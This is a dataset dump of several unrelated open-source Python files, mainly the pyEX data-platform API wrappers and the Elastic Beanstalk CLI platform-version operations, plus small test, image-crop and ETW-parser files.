max_stars_repo_path (string, 4-245) | max_stars_repo_name (string, 7-115) | max_stars_count (int64, 101-368k) | id (string, 2-8) | content (string, 6-1.03M)
---|---|---|---|---|
shorttext/metrics/embedfuzzy/__init__.py | vishalbelsare/PyShortTextCategorization | 481 | 115345 |
<gh_stars>100-1000
from .jaccard import jaccardscore_sents
|
llvm/utils/lit/tests/lld-features.py | mkinsner/llvm | 2,338 | 115354 |
<reponame>mkinsner/llvm<filename>llvm/utils/lit/tests/lld-features.py
## Show that each of the LLD variants detected by use_lld comes with its own
## feature.
# RUN: %{lit} %{inputs}/lld-features 2>&1 | FileCheck %s -DDIR=%p
# CHECK: Passed: 4
|
pyEX/platform/platform.py | vishalbelsare/pyEX | 107 | 115379 |
# *****************************************************************************
#
# Copyright (c) 2021, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from functools import wraps
import json
import pandas as pd
from ..common import (
PyEXception,
_interpolateDatatype,
_dateRange,
_get,
_getAsync,
_patch,
_patchAsync,
_post,
_postAsync,
_put,
_putAsync,
_delete,
_deleteAsync,
_quoteSymbols,
_strOrDate,
)
def _queryURL(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
offset=0,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
transforms=None,
basePath="query",
**extra_params,
):
base_url = basePath
if provider:
base_url += "/{}".format(provider)
if provider and id:
base_url += "/{}".format(_quoteSymbols(id))
if provider and id and key:
base_url += "/{}".format(_quoteSymbols(key))
if provider and id and key and subkey:
base_url += "/{}".format(_quoteSymbols(subkey))
base_url += "?"
if provider and id:
if range:
base_url += "range={}&".format(_dateRange(range))
if calendar:
base_url += "calendar={}&".format(str(calendar))
if limit and not last and (not from_ or not to_):
base_url += "limit={}&".format(str(limit))
if offset > 0:
base_url += "offset={}&".format(offset)
if subattribute:
if isinstance(subattribute, dict):
# dict mapping key to required equal value, e.g. {"A": 1} -> A|1
subattribute = ",".join(
"{}|{}".format(key, value) for key, value in subattribute.items()
)
elif isinstance(subattribute, list):
# list of tuples mapping key to required equal value, e.g. [("A", "=", 1), ("B", "!=", 2)] -> A|1,B~2
subattribute = ",".join(
"{}{}{}".format(v1, "|" if v2.upper() == "=" else "~", v3)
for v1, v2, v3 in subattribute
)
base_url += "subattribute={}&".format(subattribute)
if dateField:
base_url += "dateField={}&".format(dateField)
if from_:
base_url += "from={}&".format(_strOrDate(from_))
if to_:
base_url += "to={}&".format(_strOrDate(to_))
if on:
base_url += "on={}&".format(_strOrDate(on))
if last:
base_url += "last={}&".format(str(last))
if first:
base_url += "first={}&".format(str(first))
if sort:
if sort.lower() not in (
"asc",
"desc",
):
raise PyEXception("Sort must be in (asc, desc), got: {}".format(sort))
base_url += "sort={}&".format(sort)
if interval:
base_url += "interval={}&".format(int(interval))
if transforms:
base_url += "transforms={}&".format(json.dumps(transforms or []))
if extra_params:
base_url += "&".join("{}={}".format(k, v) for k, v in extra_params.items())
return base_url
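# Illustrative usage sketch (not part of the pyEX source; values are hypothetical
# and _quoteSymbols is assumed to return plain symbols unchanged). It shows how
# _queryURL composes the request path and query string from its keyword arguments:
#
#     _queryURL(provider="CORE", id="AAPL", key="quote", limit=5)
#     # -> 'query/CORE/AAPL/quote?limit=5&'
#
#     _queryURL(provider="CORE", id="AAPL", subattribute={"sector": "tech"})
#     # -> 'query/CORE/AAPL?limit=1&subattribute=sector|tech&'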
def _queryMetaUrl(provider="", id="", key="", subkey=""):
url = "meta"
if provider:
url += "/{}".format(provider)
if not id and key:
id = "*"
if id:
url += "/{}".format(id)
if key:
url += "/{}".format(key)
if subkey:
url += "/{}".format(subkey)
return url
def queryMeta(
provider="",
id="",
key="",
subkey="",
token="",
version="stable",
filter="",
format="json",
):
return _get(
_queryMetaUrl(provider=provider, id=id, key=key, subkey=subkey),
token=token,
version=version,
filter=filter,
format=format,
)
async def queryMetaAsync(
provider="",
id="",
key="",
subkey="",
token="",
version="stable",
filter="",
format="json",
):
return await _getAsync(
_queryMetaUrl(provider=provider, id=id, key=key, subkey=subkey),
token=token,
version=version,
filter=filter,
format=format,
)
@wraps(queryMeta)
def queryMetaDF(*args, **kwargs):
return pd.DataFrame(queryMeta(*args, **kwargs))
def query(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
transforms=None,
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
transforms=transforms,
**extra_params,
)
return _get(base_url, token=token, version=version, filter=filter, format=format)
@wraps(query)
def queryDF(*args, **kwargs):
return pd.DataFrame(query(*args, **kwargs))
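# Hedged usage sketch (illustrative only): fetching query results as a DataFrame.
# The dataset name and token below are placeholders, not real pyEX identifiers.
#
#     df = queryDF(provider="CORE", id="MY_DATASET", key="AAPL",
#                  limit=10, token="YOUR_TOKEN")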
async def queryAsync(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
transforms=None,
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
transforms=transforms,
**extra_params,
)
return await _getAsync(
base_url, token=token, version=version, filter=filter, format=format
)
def listJobs(
provider,
type="ingest",
jobId="",
token="",
version="stable",
filter="",
format="json",
):
url = "jobs/{}/{}".format(provider, type)
if jobId:
url += "/{}".format(jobId)
return _get(url=url, token=token, version=version, filter=filter, format=format)
def listDatasets(
provider="CORE", id="", token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id)
return _get(
url=base_url, token=token, version=version, filter=filter, format=format
)
@wraps(listDatasets)
def listDatasetsDF(*args, **kwargs):
return pd.DataFrame(listDatasets(*args, **kwargs))
async def listDatasetsAsync(
provider="CORE", id="", token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id)
return await _getAsync(
url=base_url, token=token, version=version, filter=filter, format=format
)
def createDataset(
provider, id="", schema=None, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, limit=None, basePath="datasets")
# TODO schema validation
return _post(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
async def createDatasetAsync(
provider, id="", schema=None, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
# TODO schema validation
return await _postAsync(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
def loadData(
provider,
id,
data,
dataType="",
token="",
version="stable",
filter="",
format="json",
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
# data interpolation
if not dataType:
data, headers = _interpolateDatatype(data)
else:
headers = {"content-type": dataType}
# TODO schema validation
return _put(
url=base_url,
data=data,
token=token,
version=version,
filter=filter,
format=format,
token_in_params=True,
headers=headers,
)
async def loadDataAsync(
provider, id, data, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
# TODO schema validation
return await _putAsync(
url=base_url,
data=data,
token=token,
version=version,
token_in_params=True,
format=format,
)
def modifyDataset(
provider, id, schema, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
return _patch(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
async def modifyDatasetAsync(
provider, id, schema, token="", version="stable", filter="", format="json"
):
base_url = _queryURL(provider=provider, id=id, limit=None, basePath="datasets")
return await _patchAsync(
url=base_url,
json=schema,
token=token,
version=version,
token_in_params=True,
format=format,
)
def modifyData(
transforms=None,
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return _patch(
url=base_url,
json=transforms,
token=token,
version=version,
token_in_params=True,
format=format,
)
async def modifyDataAsync(
transforms=None,
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return await _patchAsync(
url=base_url,
json=transforms,
token=token,
version=version,
token_in_params=True,
format=format,
)
def deleteData(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return _delete(
url=base_url, token=token, version=version, filter=filter, format=format
)
async def deleteDataAsync(
provider="CORE",
id="",
key="",
subkey="",
range=None,
calendar=False,
limit=1,
subattribute="",
dateField=None,
from_=None,
to_=None,
on=None,
last=0,
first=0,
sort="",
interval=None,
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
key=key,
subkey=subkey,
range=range,
calendar=calendar,
limit=limit,
subattribute=subattribute,
dateField=dateField,
from_=from_,
to_=to_,
on=on,
last=last,
first=first,
sort=sort,
interval=interval,
basePath="datasets",
**extra_params,
)
return await _deleteAsync(
url=base_url, token=token, version=version, filter=filter, format=format
)
def deleteDataset(
provider="CORE",
id="",
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
limit=None,
basePath="datasets",
)
return _delete(
url=base_url, token=token, version=version, filter=filter, format=format
)
async def deleteDatasetAsync(
provider="CORE",
id="",
token="",
version="stable",
filter="",
format="json",
**extra_params,
):
base_url = _queryURL(
provider=provider,
id=id,
limit=None,
basePath="datasets",
)
return await _deleteAsync(
url=base_url, token=token, version=version, filter=filter, format=format
)
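# Illustrative end-to-end sketch of the dataset helpers above (not part of the
# original module; the dataset name, schema, data payload, and token are placeholders):
#
#     schema = {"name": "MY_DATASET", "schema": {"type": "object"}}
#     createDataset(provider="CORE", id="MY_DATASET", schema=schema, token="YOUR_TOKEN")
#     loadData(provider="CORE", id="MY_DATASET", data="col1,col2\n1,2\n",
#              dataType="text/csv", token="YOUR_TOKEN")
#     rows = query(provider="CORE", id="MY_DATASET", limit=100, token="YOUR_TOKEN")
#     deleteDataset(provider="CORE", id="MY_DATASET", token="YOUR_TOKEN")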
|
pil_pillow__examples/crop.py | DazEB2/SimplePyScripts | 117 | 115412 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install Pillow
from PIL import Image
image_file = "blur/input.jpg"
img = Image.open(image_file)
cropped_img = img.crop((175, 42, 336, 170))
cropped_img.show()
|
ebcli/operations/platform_version_ops.py | sdolenc/aws-elastic-beanstalk-cli | 110 | 115542 |
<filename>ebcli/operations/platform_version_ops.py
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from datetime import datetime
import os
import sys
import tempfile
from shutil import copyfile, move
import threading
import yaml
from semantic_version import Version
from termcolor import colored
from ebcli.core import io, fileoperations
from ebcli.core.ebglobals import Constants
from ebcli.lib import elasticbeanstalk, heuristics, s3
from ebcli.objects import api_filters
from ebcli.objects.exceptions import (
InvalidPlatformVersionError,
NotFoundError,
PlatformWorkspaceEmptyError,
ValidationError,
)
from ebcli.objects.platform import PlatformBranch, PlatformVersion
from ebcli.objects.sourcecontrol import SourceControl
from ebcli.operations import commonops, logsops
from ebcli.operations.tagops import tagops
from ebcli.resources.statics import namespaces, option_names
from ebcli.resources.strings import alerts, strings, prompts
from ebcli.resources.regex import PackerRegExpressions, PlatformRegExpressions
class PackerStreamMessage(object):
def __init__(self, event):
self.event = event
def raw_message(self):
event = self.event
if isinstance(event, bytes):
event = event.decode('utf-8')
matches = PackerRegExpressions.LOG_MESSAGE_REGEX.search(event)
return matches.groups(0)[0] if matches else None
def message_severity(self):
matches = PackerRegExpressions.LOG_MESSAGE_SEVERITY_REGEX.search(self.event)
return matches.groups(0)[0] if matches else None
def format(self):
ui_message = self.ui_message()
if ui_message:
return ui_message
other_packer_message = self.other_packer_message()
if other_packer_message:
if sys.version_info < (3, 0):
other_packer_message = other_packer_message.encode('utf-8')
other_packer_message_target = self.other_packer_message_target()
formatted_other_message = '{}:{}'.format(
other_packer_message_target,
other_packer_message
)
if sys.version_info < (3, 0):
formatted_other_message = formatted_other_message.decode('utf-8')
return formatted_other_message
other_message = self.other_message()
if other_message:
return other_message
def ui_message(self):
return self.__return_match(PackerRegExpressions.PACKER_UI_MESSAGE_FORMAT_REGEX)
def other_packer_message(self):
return self.__return_match(PackerRegExpressions.PACKER_OTHER_MESSAGE_DATA_REGEX)
def other_packer_message_target(self):
return self.__return_match(PackerRegExpressions.PACKER_OTHER_MESSAGE_TARGET_REGEX)
def other_message(self):
return self.__return_match(PackerRegExpressions.OTHER_FORMAT_REGEX)
def __return_match(self, regex):
raw_message = self.raw_message()
if not raw_message:
return
if isinstance(raw_message, bytes):
raw_message = raw_message.decode('utf-8')
matches = regex.search(raw_message)
return matches.groups(0)[0].strip() if matches else None
class PackerStreamFormatter(object):
def format(self, message, stream_name=None):
packer_stream_message = PackerStreamMessage(message)
if packer_stream_message.raw_message():
formatted_message = packer_stream_message.format()
else:
formatted_message = '{0} {1}'.format(stream_name, message)
return formatted_message
def create_platform_version(
version,
major_increment,
minor_increment,
patch_increment,
instance_type,
vpc=None,
staged=False,
timeout=None,
tags=None,
):
_raise_if_directory_is_empty()
_raise_if_platform_definition_file_is_missing()
version and _raise_if_version_format_is_invalid(version)
platform_name = fileoperations.get_platform_name()
instance_profile = fileoperations.get_instance_profile(None)
key_name = commonops.get_default_keyname()
version = version or _resolve_version_number(
platform_name,
major_increment,
minor_increment,
patch_increment
)
tags = tagops.get_and_validate_tags(tags)
source_control = SourceControl.get_source_control()
io.log_warning(strings['sc.unstagedchanges']) if source_control.untracked_changes_exist() else None
version_label = _resolve_version_label(source_control, staged)
bucket, key, file_path = _resolve_s3_bucket_and_key(platform_name, version_label, source_control, staged)
_upload_platform_version_to_s3_if_necessary(bucket, key, file_path)
io.log_info('Creating Platform Version ' + version_label)
response = elasticbeanstalk.create_platform_version(
platform_name, version, bucket, key, instance_profile, key_name, instance_type, tags, vpc)
environment_name = 'eb-custom-platform-builder-packer'
io.echo(colored(
strings['platformbuildercreation.info'].format(environment_name), attrs=['reverse']))
fileoperations.update_platform_version(version)
commonops.set_environment_for_current_branch(environment_name)
stream_platform_logs(response, platform_name, version, timeout)
def delete_platform_version(platform_version, force=False):
arn = version_to_arn(platform_version)
if not force:
io.echo(prompts['platformdelete.confirm'].replace('{platform-arn}', arn))
io.validate_action(prompts['platformdelete.validate'], arn)
environments = []
try:
environments = [env for env in elasticbeanstalk.get_environments() if env.platform.version == arn]
except NotFoundError:
pass
if len(environments) > 0:
_, platform_name, platform_version = PlatformVersion.arn_to_platform(arn)
raise ValidationError(strings['platformdeletevalidation.error'].format(
platform_name,
platform_version,
'\n '.join([env.name for env in environments])
))
response = elasticbeanstalk.delete_platform(arn)
request_id = response['ResponseMetadata']['RequestId']
timeout = 10
commonops.wait_for_success_events(request_id, timeout_in_minutes=timeout, platform_arn=arn)
def describe_custom_platform_version(
owner=None,
platform_arn=None,
platform_name=None,
platform_version=None,
status=None
):
if not platform_arn:
platforms = list_custom_platform_versions(
platform_name=platform_name,
platform_version=platform_version,
status=status
)
platform_arn = platforms[0]
return elasticbeanstalk.describe_platform_version(platform_arn)
def find_custom_platform_version_from_string(solution_string):
available_custom_platforms = list_custom_platform_versions()
for custom_platform_matcher in [
PlatformVersion.match_with_complete_arn,
PlatformVersion.match_with_platform_name,
]:
matched_custom_platform = custom_platform_matcher(available_custom_platforms, solution_string)
if matched_custom_platform:
return matched_custom_platform
def get_latest_custom_platform_version(platform):
"""
:param platform: A custom platform ARN or a custom platform name
:return: A PlatformVersion object representing the latest version of `platform`
"""
account_id, platform_name, platform_version = PlatformVersion.arn_to_platform(platform)
if account_id:
matching_platforms = list_custom_platform_versions(
platform_name=platform_name,
status='Ready'
)
if matching_platforms:
return PlatformVersion(matching_platforms[0])
def get_latest_eb_managed_platform(platform_arn):
account_id, platform_name, platform_version = PlatformVersion.arn_to_platform(platform_arn)
if not account_id:
matching_platforms = list_eb_managed_platform_versions(
platform_name=platform_name,
status='Ready'
)
if matching_platforms:
return PlatformVersion(matching_platforms[0])
def get_latest_platform_version(platform_name=None, owner=None, ignored_states=None):
if ignored_states is None:
ignored_states = ['Deleting', 'Failed']
platforms = get_platforms(
platform_name=platform_name,
ignored_states=ignored_states,
owner=owner,
platform_version="latest"
)
try:
return platforms[platform_name]
except KeyError:
return None
def get_platforms(platform_name=None, ignored_states=None, owner=None, platform_version=None):
platform_list = list_custom_platform_versions(
platform_name=platform_name,
platform_version=platform_version
)
platforms = dict()
for platform in platform_list:
if ignored_states and platform['PlatformStatus'] in ignored_states:
continue
_, platform_name, platform_version = PlatformVersion.arn_to_platform(platform)
platforms[platform_name] = platform_version
return platforms
def get_platform_arn(platform_name, platform_version, owner=None):
platform = describe_custom_platform_version(
platform_name=platform_name,
platform_version=platform_version,
owner=owner
)
if platform:
return platform['PlatformArn']
def get_platform_versions_for_branch(branch_name, recommended_only=False):
filters = [
{
'Type': 'PlatformBranchName',
'Operator': '=',
'Values': [branch_name],
}
]
if recommended_only:
filters.append({
'Type': 'PlatformLifecycleState',
'Operator': '=',
'Values': ['Recommended'],
})
platform_version_summaries = elasticbeanstalk.list_platform_versions(
filters=filters)
return [
PlatformVersion.from_platform_version_summary(summary)
for summary in platform_version_summaries]
def get_preferred_platform_version_for_branch(branch_name):
"""
Gets the latest recommended platform version for a platform branch. If no
    platform versions are recommended, it retrieves the latest.
"""
matched_versions = get_platform_versions_for_branch(branch_name)
matched_versions = list(sorted(
matched_versions,
key=lambda x: x.sortable_version,
reverse=True))
recommended_versions = [
version for version in matched_versions if version.is_recommended]
if len(recommended_versions) > 0:
return recommended_versions[0]
elif len(matched_versions) > 0:
return matched_versions[0]
else:
raise NotFoundError(alerts['platform.invalidstring'].format(
branch_name))
def list_custom_platform_versions(
platform_name=None,
platform_version=None,
show_status=False,
status=None
):
filters = [api_filters.PlatformOwnerFilter(values=[Constants.OWNED_BY_SELF]).json()]
return list_platform_versions(filters, platform_name, platform_version, show_status, status)
def list_eb_managed_platform_versions(
platform_name=None,
platform_version=None,
show_status=False,
status=None
):
filters = [api_filters.PlatformOwnerFilter(values=['AWSElasticBeanstalk']).json()]
return list_platform_versions(filters, platform_name, platform_version, show_status, status)
def list_platform_versions(
filters,
platform_name=None,
platform_version=None,
show_status=False,
status=None
):
if platform_name:
filters.append(
api_filters.PlatformNameFilter(values=[platform_name]).json()
)
if platform_version:
filters.append(
api_filters.PlatformVersionFilter(values=[platform_version]).json()
)
if status:
filters.append(
api_filters.PlatformStatusFilter(values=[status]).json()
)
platforms_list = elasticbeanstalk.list_platform_versions(filters=filters)
return __formatted_platform_descriptions(platforms_list, show_status)
def stream_platform_logs(response, platform_name, version, timeout):
arn = response['PlatformSummary']['PlatformArn']
request_id = response['ResponseMetadata']['RequestId']
streamer = io.get_event_streamer()
builder_events = threading.Thread(
target=logsops.stream_platform_logs,
args=(platform_name, version, streamer, 5, None, PackerStreamFormatter()))
builder_events.daemon = True
builder_events.start()
commonops.wait_for_success_events(
request_id,
platform_arn=arn,
streamer=streamer,
timeout_in_minutes=timeout or 30
)
def version_to_arn(platform_version):
platform_name = fileoperations.get_platform_name()
arn = None
if PlatformRegExpressions.VALID_PLATFORM_VERSION_FORMAT.match(platform_version):
arn = get_platform_arn(platform_name, platform_version, owner=Constants.OWNED_BY_SELF)
elif PlatformVersion.is_valid_arn(platform_version):
arn = platform_version
elif PlatformRegExpressions.VALID_PLATFORM_SHORT_FORMAT.match(platform_version):
match = PlatformRegExpressions.VALID_PLATFORM_SHORT_FORMAT.match(platform_version)
platform_name, platform_version = match.group(1, 2)
arn = get_platform_arn(platform_name, platform_version, owner=Constants.OWNED_BY_SELF)
if not arn:
raise InvalidPlatformVersionError(strings['exit.nosuchplatformversion'])
return arn
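# Note (added for clarity, not in the original source): version_to_arn accepts
# three spellings, resolved in this order -- a bare version such as "1.0.3"
# (looked up under the workspace's platform name), a full platform ARN, or the
# short "platform-name/1.0.3" form matched by VALID_PLATFORM_SHORT_FORMAT.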
def _create_app_version_zip_if_not_present_on_s3(
platform_name,
version_label,
source_control,
staged
):
s3_bucket, s3_key = commonops.get_app_version_s3_location(platform_name, version_label)
file_name, file_path = None, None
if s3_bucket is None and s3_key is None:
file_name, file_path = commonops._zip_up_project(version_label, source_control, staged=staged)
s3_bucket = elasticbeanstalk.get_storage_location()
s3_key = platform_name + '/' + file_name
return s3_bucket, s3_key, file_path
def _datetime_now():
return datetime.now()
def _enable_healthd():
option_settings = []
option_settings.append({
'namespace': namespaces.HEALTH_SYSTEM,
'option_name': option_names.SYSTEM_TYPE,
'value': 'enhanced'
})
option_settings.append({
'namespace': namespaces.ENVIRONMENT,
'option_name': option_names.SERVICE_ROLE,
'value': 'aws-elasticbeanstalk-service-role'
})
fileoperations.ProjectRoot.traverse()
with open('platform.yaml', 'r') as stream:
platform_yaml = yaml.safe_load(stream)
try:
platform_options = platform_yaml['option_settings']
except KeyError:
platform_options = []
options_to_inject = []
for option in option_settings:
found_option = False
for platform_option in platform_options:
            if (option['namespace'] == platform_option['namespace']
                    and option['option_name'] == platform_option['option_name']):
found_option = True
break
if not found_option:
options_to_inject.append(option)
platform_options.extend(options_to_inject)
platform_yaml['option_settings'] = list(platform_options)
with open('platform.yaml', 'w') as stream:
stream.write(yaml.dump(platform_yaml, default_flow_style=False))
def _generate_platform_yaml_copy():
file_descriptor, original_platform_yaml = tempfile.mkstemp()
os.close(file_descriptor)
copyfile('platform.yaml', original_platform_yaml)
return original_platform_yaml
def _raise_if_directory_is_empty():
cwd = os.getcwd()
fileoperations.ProjectRoot.traverse()
try:
if heuristics.directory_is_empty():
raise PlatformWorkspaceEmptyError(strings['exit.platformworkspaceempty'])
finally:
os.chdir(cwd)
def _raise_if_platform_definition_file_is_missing():
if not heuristics.has_platform_definition_file():
raise PlatformWorkspaceEmptyError(strings['exit.no_pdf_file'])
def _raise_if_version_format_is_invalid(version):
if not PlatformRegExpressions.VALID_PLATFORM_VERSION_FORMAT.match(version):
raise InvalidPlatformVersionError(strings['exit.invalidversion'])
def _resolve_s3_bucket_and_key(
platform_name,
version_label,
source_control,
staged
):
platform_yaml_copy = _generate_platform_yaml_copy()
try:
_enable_healthd()
s3_bucket, s3_key, file_path = _create_app_version_zip_if_not_present_on_s3(
platform_name,
version_label,
source_control,
staged
)
finally:
move(platform_yaml_copy, 'platform.yaml')
return s3_bucket, s3_key, file_path
def _resolve_version_label(source_control, staged):
version_label = source_control.get_version_label()
if staged:
timestamp = _datetime_now().strftime("%y%m%d_%H%M%S")
version_label = version_label + '-stage-' + timestamp
return version_label
def _resolve_version_number(
platform_name,
major_increment,
minor_increment,
patch_increment
):
version = get_latest_platform_version(
platform_name=platform_name,
owner=Constants.OWNED_BY_SELF,
ignored_states=[]
)
if version is None:
version = '1.0.0'
else:
major, minor, patch = version.split('.', 3)
if major_increment:
major = str(int(major) + 1)
minor = '0'
patch = '0'
if minor_increment:
minor = str(int(minor) + 1)
patch = '0'
if patch_increment or not(major_increment or minor_increment):
patch = str(int(patch) + 1)
version = "%s.%s.%s" % (major, minor, patch)
return version
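# Worked example (illustrative): with a latest version of "1.2.3",
#   major_increment -> "2.0.0", minor_increment -> "1.3.0",
#   patch_increment (or no flag at all) -> "1.2.4".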
def __formatted_platform_descriptions(platforms_list, show_status):
platform_tuples = []
for platform in platforms_list:
platform_tuples.append(
{
'PlatformArn': platform['PlatformArn'],
'PlatformStatus': platform['PlatformStatus']
}
)
platform_tuples.sort(
key=lambda platform_tuple: (
PlatformVersion.get_platform_name(platform_tuple['PlatformArn']),
Version(PlatformVersion.get_platform_version(platform_tuple['PlatformArn']))
),
reverse=True
)
formatted_platform_descriptions = []
for index, platform_tuple in enumerate(platform_tuples):
if show_status:
formatted_platform_description = '{platform_arn} Status: {platform_status}'.format(
platform_arn=platform_tuple['PlatformArn'],
platform_status=platform_tuple['PlatformStatus']
)
else:
formatted_platform_description = platform_tuple['PlatformArn']
formatted_platform_descriptions.append(formatted_platform_description)
return formatted_platform_descriptions
def _upload_platform_version_to_s3_if_necessary(bucket, key, file_path):
try:
s3.get_object_info(bucket, key)
io.log_info('S3 Object already exists. Skipping upload.')
except NotFoundError:
io.log_info('Uploading archive to s3 location: ' + key)
s3.upload_platform_version(bucket, key, file_path)
fileoperations.delete_app_versions()
|
tests/spectral/test_S2_conv.py | machism0/lie_learn | 140 | 115560 |
<reponame>machism0/lie_learn<filename>tests/spectral/test_S2_conv.py
import numpy as np
import lie_learn.spaces.S2 as S2
import lie_learn.spaces.S3 as S3
import lie_learn.groups.SO3 as SO3
from lie_learn.representations.SO3.spherical_harmonics import sh
from lie_learn.spectral.S2_conv import naive_S2_conv, spectral_S2_conv, naive_S2_conv_v2
def compare_naive_and_spectral_conv():
f1 = lambda t, p: sh(l=2, m=1, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
f2 = lambda t, p: sh(l=2, m=1, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
theta, phi = S2.meshgrid(b=4, grid_type='Gauss-Legendre')
f1_grid = f1(theta, phi)
f2_grid = f2(theta, phi)
alpha, beta, gamma = S3.meshgrid(b=4, grid_type='SOFT') # TODO check convention
f12_grid_spectral = spectral_S2_conv(f1_grid, f2_grid, s2_fft=None, so3_fft=None)
f12_grid = np.zeros_like(alpha)
for i in range(alpha.shape[0]):
for j in range(alpha.shape[1]):
for k in range(alpha.shape[2]):
f12_grid[i, j, k] = naive_S2_conv(f1, f2, alpha[i, j, k], beta[i, j, k], gamma[i, j, k])
print(i, j, k, f12_grid[i, j, k])
return f1_grid, f2_grid, f12_grid, f12_grid_spectral
def naive_conv(l1=1, m1=1, l2=1, m2=1, g_parameterization='EA313'):
f1 = lambda t, p: sh(l=l1, m=m1, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
f2 = lambda t, p: sh(l=l2, m=m2, theta=t, phi=p, field='real', normalization='quantum', condon_shortley=True)
theta, phi = S2.meshgrid(b=3, grid_type='Gauss-Legendre')
f1_grid = f1(theta, phi)
f2_grid = f2(theta, phi)
alpha, beta, gamma = S3.meshgrid(b=3, grid_type='SOFT') # TODO check convention
f12_grid = np.zeros_like(alpha)
for i in range(alpha.shape[0]):
for j in range(alpha.shape[1]):
for k in range(alpha.shape[2]):
f12_grid[i, j, k] = naive_S2_conv_v2(f1, f2, alpha[i, j, k], beta[i, j, k], gamma[i, j, k], g_parameterization)
print(i, j, k, f12_grid[i, j, k])
return f1_grid, f2_grid, f12_grid
|
etl/parsers/etw/HidEventFilter.py | IMULMUL/etl-parser | 104 | 115564 |
<reponame>IMULMUL/etl-parser
# -*- coding: utf-8 -*-
"""
HidEventFilter
GUID : dde50426-fa77-4088-8e0c-f2f553fb6843
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=100, version=1)
class HidEventFilter_100_1(Etw):
pattern = Struct(
"Message" / WString
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=101, version=1)
class HidEventFilter_101_1(Etw):
pattern = Struct(
"Message" / WString
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=102, version=1)
class HidEventFilter_102_1(Etw):
pattern = Struct(
"Message" / WString,
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=103, version=1)
class HidEventFilter_103_1(Etw):
pattern = Struct(
